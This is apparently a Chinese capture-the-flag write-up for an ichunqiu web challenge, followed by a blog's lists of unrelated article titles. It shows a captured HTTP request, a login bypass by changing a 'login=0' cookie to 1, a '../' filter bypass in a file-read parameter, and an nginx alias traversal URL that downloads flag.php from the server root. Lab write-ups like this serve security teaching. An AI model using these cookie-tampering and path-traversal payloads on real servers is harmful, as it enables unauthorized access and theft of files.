题目:http://98fe42cede6c4f1c9ec3f55c0f542d06b680d580b5bf41d4.game.ichunqiu.com/login.php

题目内容:

网站要上线了,还没测试呢,怎么办?

经过测试在点击Mini-Zone的时候会有如下数据包。

GET /index.php HTTP/1.1
Host: 98fe42cede6c4f1c9ec3f55c0f542d06b680d580b5bf41d4.game.ichunqiu.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://98fe42cede6c4f1c9ec3f55c0f542d06b680d580b5bf41d4.game.ichunqiu.com/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; pgv_pvi=7564516352; UM_distinctid=164bb2a2660862-02cd87a728541b-3a760e5d-1fa400-164bb2a2661ce3; browse=CFlbTxUYU0BQU1hEVQJTRFBZSkdeQFFYWVRFR1xRWEJTV1hPXEdLTgBZXkRdSVpOGllZTFRTW0VYW0VFWVxbRklSWE9cRFNHXUFTHFREUUdZVlMGVEBQT0tRWERWXFlCRFFbVV9EU0FcWVxCTEoU; pgv_si=s2308230144; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1532146712,1532226185,1532311636,1532421067; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1532421150; ci_session=19b555adbbafd0f07b5833ee0a823f476db15f2f; login=0
Connection: close

有一个login参数为0将其改为1即登录成功。

然后发现如下URL,直接可判断为文件读取。

http://4ffbe25b5aee42ae9c6644d535d42cb0d37c385304924a5c.game.ichunqiu.com/manages/admin.php?module=index&name=php

然后测试是否过滤了../或者./

http://4ffbe25b5aee42ae9c6644d535d42cb0d37c385304924a5c.game.ichunqiu.com/manages/admin.php?module=inde../x&name=php 访问正常(将../替换为空了)

http://4ffbe25b5aee42ae9c6644d535d42cb0d37c385304924a5c.game.ichunqiu.com/manages/admin.php?module=inde./x&name=php 访问错误

直接读取flag.php(之前dirsearch有在根目录扫描到flag.php)发现失败。

然后读取nginx的配置文件发现一个目录遍历漏洞。

然后就可以通过

online-movies       #遍历online-movies目录

以及

/online-movies../  #遍历整个/online-movies../(其实就是服务器的根目录了),然后可以通过../后面输入目录进行遍历了,如果是文件就可以直接被下载。

http://032d3f10268c4cf790562d76c8b643a547b3246e6a494a33.game.ichunqiu.com/online-movies../var/www/html/flag.php

最新文章

  1. python logging colorlog
  2. 【09-27】Spring 学习笔记
  3. javascrip小笔记
  4. .Net MVC中访问PC网页时,自动切换到移动端对应页面
  5. 图说苹果工作站-MAC PRO
  6. javascript针对DOM的应用
  7. 一步步学习ASP.NET MVC3 章节总结
  8. Django 1.10中文文档—第一个Django应用Part1
  9. ajaxfileupload
  10. C# Winform WindowsMediaPlayer控件
  11. ASP:GB2312格式文本文件转换成UTF-8格式
  12. 新博客在SEO方面需要注意哪几点?
  13. WebApi接口返回json,xml,text纯文本等
  14. JavaScript的那些事儿
  15. socket,模拟服务器、客户端通信
  16. Python不能用于大型项目?关于Python的10大误解
  17. 转-CSRF&OWASP CSRFGuard
  18. JDK 自带的观察者模式源码分析以及和自定义实现的取舍
  19. layer[申明:来源于网络]
  20. 短信猫+kannel调试一例

热门文章

  1. MVC SignalR Hub初学
  2. Django 2.0 学习(14):Django ORM 数据库操作(上)
  3. BZOJ4890 Tjoi2017城市
  4. 【BZOJ2306】幸福路径(动态规划,倍增)
  5. max os取消开机启动
  6. Hystrix : 解决请求会被拒绝和抛出异常并且fallback不会被调用的问题
  7. spark(一)
  8. 【BZOJ 1129】[POI2008]Per 二叉堆
  9. bzoj2962 序列操作
  10. Codeforces 25.E Test